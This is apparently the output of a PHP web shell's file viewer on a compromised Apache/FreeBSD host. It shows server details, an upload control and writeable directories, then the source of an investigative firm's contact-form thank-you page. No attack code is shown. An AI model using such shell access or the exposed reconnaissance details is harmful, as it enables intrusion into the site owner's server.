KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/memanuel/investidata/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/memanuel/investidata/thankyou.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Investidata.com</title>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #616264;
}
-->
</style>
<link href="css.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
.style1 {color: #166592}
.style3 {font-size: 11px; font-weight: normal; text-decoration: none; font-family: Arial, Helvetica, sans-serif;}
.style4 {color: #000000}
.style7 {color: #666666; }
-->
</style>
<script Language="JavaScript">

function Form_Validator(theForm)
{
//alert("ssssssssssssssss");
//exit();
     
 
  
  
   if (theForm.email.value == "")
  {
    alert("Please enter a value for the \"Email\" field.");
    theForm.email.focus();
    return (false);
  }
  if (!isValidEmailStrict(theForm.email.value))
  {
    alert("Please enter appropriate  value for the \"Email\" field.");
    theForm.email.focus();
    return (false);
  }else if (theForm.subject.value == ""){
    alert("Please enter a value for the \"subject\" field.");
    theForm.subject.focus();
    return (false);
  }else if (theForm.mesagetxt.value == ""){
    alert("Please enter a value for the \"Message\" field.");
    theForm.mesagetxt.focus();
    return (false);
  }else{ 
  //alert('ssssssssssssssssssss');
  //exit();
  document.theForm.submit();
  return (true);
  
  }
}


function isValidEmail(address) {
	if (address.indexOf('@') < 1) return false;
	var name = address.substring(0, address.indexOf('@'));
	var domain = address.substring(address.indexOf('@') + 1);
	if (name.indexOf('(') != -1 || name.indexOf(')') != -1 || name.indexOf('<') != -1 || name.indexOf('>') != -1 || name.indexOf(',') != -1 || name.indexOf(';') != -1 || name.indexOf(':') != -1 || name.indexOf('\\') != -1 || name.indexOf('"') != -1 || name.indexOf('[') != -1 || name.indexOf(']') != -1 || name.indexOf(' ') != -1) return false;
	if (domain.indexOf('(') != -1 || domain.indexOf(')') != -1 || domain.indexOf('<') != -1 || domain.indexOf('>') != -1 || domain.indexOf(',') != -1 || domain.indexOf(';') != -1 || domain.indexOf(':') != -1 || domain.indexOf('\\') != -1 || domain.indexOf('"') != -1 || domain.indexOf('[') != -1 || domain.indexOf(']') != -1 || domain.indexOf(' ') != -1) return false;
	return true;
}


// Check that an email address has the form [email protected]
// This is a stricter standard than RFC 821 (?) which allows addresses like postmaster@localhost
function isValidEmailStrict(address) {
	if (isValidEmail(address) == false) return false;
	var domain = address.substring(address.indexOf('@') + 1);
	if (domain.indexOf('.') == -1) return false;
	if (domain.indexOf('.') == 0 || domain.indexOf('.') == domain.length - 1) return false;
	return true;
}
function IsNumeric(strString)
   //  check for valid numeric strings	
   {
   var strValidChars = "abcdefghijklmnopqrstuvwxyz.-";
   var strChar;
   var blnResult = true;

   if (strString.length == 0) return false;

   //  test strString consists of valid characters listed above
   for (i = 0; i < strString.length && blnResult == true; i++)
      {
      strChar = strString.charAt(i);
      if (strValidChars.indexOf(strChar) == -1)
         {
         blnResult = false;
         }
      }
   return blnResult;
   }
</script>
</head>

<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td height="20" colspan="3" scope="col">&nbsp;</td>
  </tr>
  <tr>
    <td scope="col">&nbsp;</td>
    <td width="836" scope="col"><table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
      <tr>
        <td align="center" valign="top" bgcolor="#FFFFFF" scope="col"><img src="images/innerheader.jpg" alt="Investidata" width="836" height="194" border="0" /></td>
      </tr>
      
      <tr>
        <td height="2" align="left" valign="top" bgcolor="#FFFFFF"></td>
      </tr>
      <tr>
        <td align="left" valign="top"><table width="820" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
          <tr>
            <td width="200" align="left" valign="top" class="leftgra" scope="col"><table width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
              <tr>
                <td height="15" scope="col"></td>
              </tr>
              <tr>
                <td width="90%" height="25" class="leftlinks"><a href="index.html" title="Click here to begin">Home</a></td>
              </tr>
              <tr>
                <td height="1" scope="col"><img src="images/blueline2.jpg" width="180" height="1" /></td>
              </tr>
              <tr>
                <td height="25" class="leftlinks" style="cursor:pointer;" scope="col"onmouseover="this.bgColor='#508FAB'" 
                      onmouseout="this.bgColor=''" ><a href="our-vision.html">Vision</a></td>
              </tr>
              <tr>
                <td height="1" scope="col"><img src="images/blueline2.jpg" width="180" height="1" /></td>
              </tr>
              <tr> </tr>
              <tr>
                <td height="25" class="leftlinks" style="cursor:pointer;" scope="col"onmouseover="this.bgColor='#508FAB'" 
                      onmouseout="this.bgColor=''" ><a href="services.html">Services</a></td>
              </tr>
              <tr>
                <td height="1" scope="col"><img src="images/blueline2.jpg" width="180" height="1" /></td>
              </tr>
              <tr>
                <td height="25" class="leftlinks" style="cursor:pointer;" scope="col"onmouseover="this.bgColor='#508FAB'" 
                      onmouseout="this.bgColor=''" ><a href="contactus.html">Inquiries</a></td>
              </tr>
              <tr>
                <td height="1" scope="col"><img src="images/blueline2.jpg" width="180" height="1" /></td>
              </tr>
              <tr>
                <td height="25" class="leftlinks" style="cursor:pointer;" scope="col"onmouseover="this.bgColor='#508FAB'" 
                      onmouseout="this.bgColor=''" ><a href="affiliations.html">Affiliations</a></td>
              </tr>
              <tr>
                <td scope="col">&nbsp;</td>
              </tr>
              <tr>
                <td align="left" valign="top" class="contactimg" scope="col"><table width="148" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td height="13" scope="col"></td>
                  </tr>
                  <tr>
                    <td height="28"><img src="images/contact.jpg" width="91" height="14" /></td>
                  </tr>
                  <tr>
                    <td height="1" bgcolor="#828884"></td>
                  </tr>
                  <tr>
                    <td height="43" class="arial12"><strong><span class="style1">Phone</span><br />
                          <span class="arial11">703.403.1250</span></strong></td>
                  </tr>
                  <tr>
                    <td><img src="images/dot.jpg" width="145" height="1" /></td>
                  </tr>
                  <tr>
                    <td height="43"><span class="arial12 style1"><strong>Email <br class="style1" />
                    </strong></span><span class="arial11"><strong> <span class="style3"><a href="mailto:[email protected]" class="arial11" title="Email Me-[Opens up your email application]">[email protected]</a></span></strong></span></td>
                  </tr>
                  <tr>
                    <td><img src="images/dot.jpg" width="145" height="1" /></td>
                  </tr>
                  <tr>
                    <td height="43" class="arial12"><strong> <span class="style1">Fax</span><br />
                          <span class="arial11">703.738.6049</span></strong></td>
                  </tr>
                </table></td>
              </tr>
              <tr>
                <td align="left" valign="top" scope="col">&nbsp;</td>
              </tr>
            </table></td>
            <td width="603" align="left" valign="top" class="sepration" scope="col"><table width="100%" height="42" border="0" cellpadding="0" cellspacing="0">
              <tr>
                <td valign="top" class="rightimg" scope="col">
				
				<table width="93%" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td height="50" align="left" valign="middle" class="arial22">Thanks </td>
                  </tr>
                  
                  <tr>
                    <td height="3" align="left" valign="middle"><img src="images/sep2.jpg" width="138" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="10" align="left" valign="top"></td>
                  </tr>
                  <tr>
                    <td align="left" valign="top" class="arial12 style4">Your Message has been successfully sent to admin. </td>
                  </tr>
                  
                  
                  
                  <tr>
                    <td align="left" valign="top" scope="col"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="arial12">
                      
                     
                     
                     
                     
                      
                      
                    </table></td>
                  </tr>
                  <tr>
                    <td align="left" valign="top">&nbsp;</td>
                  </tr>
                  
                  
                </table>
				</td>
              </tr>
              
            </table></td>
            </tr>
          <tr>
            <td height="1" colspan="2" align="left" valign="top" bgcolor="#B8B6B6" scope="col"></td>
          </tr>
          <tr>
            <td height="68" colspan="2" align="left" valign="middle" class="bottomgra" scope="col"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" class="arial11dark">
              <tr>
                <td scope="col">Virginia Private Investigative Service License nbr. 11-4948&nbsp; :: &nbsp;Washington DC Private Detective Agency License nbr. 3090</td>
              </tr>
              <tr>
                <td scope="col">Copyright 2007 All Rights Reserved | Website by <a href="http://www.futerox.com/web_design/" class="arial11dark">Website Design</a> &amp; <a href="http://www.futerox.com/web_development/" target="_blank" class="arial11dark">Developed by</a> : <a href="http://www.futerox.com/" target="_blank" class="arial11dark" title="Futerox Interactive:: Web Designing Company In India">Futerox Interactive</a></td>
              </tr>
            </table></td>
            </tr>
        </table></td>
      </tr>
      
    </table></td>
    <td scope="col">&nbsp;</td>
  </tr>
</table>
</body>
</html>

Anon7 - 2021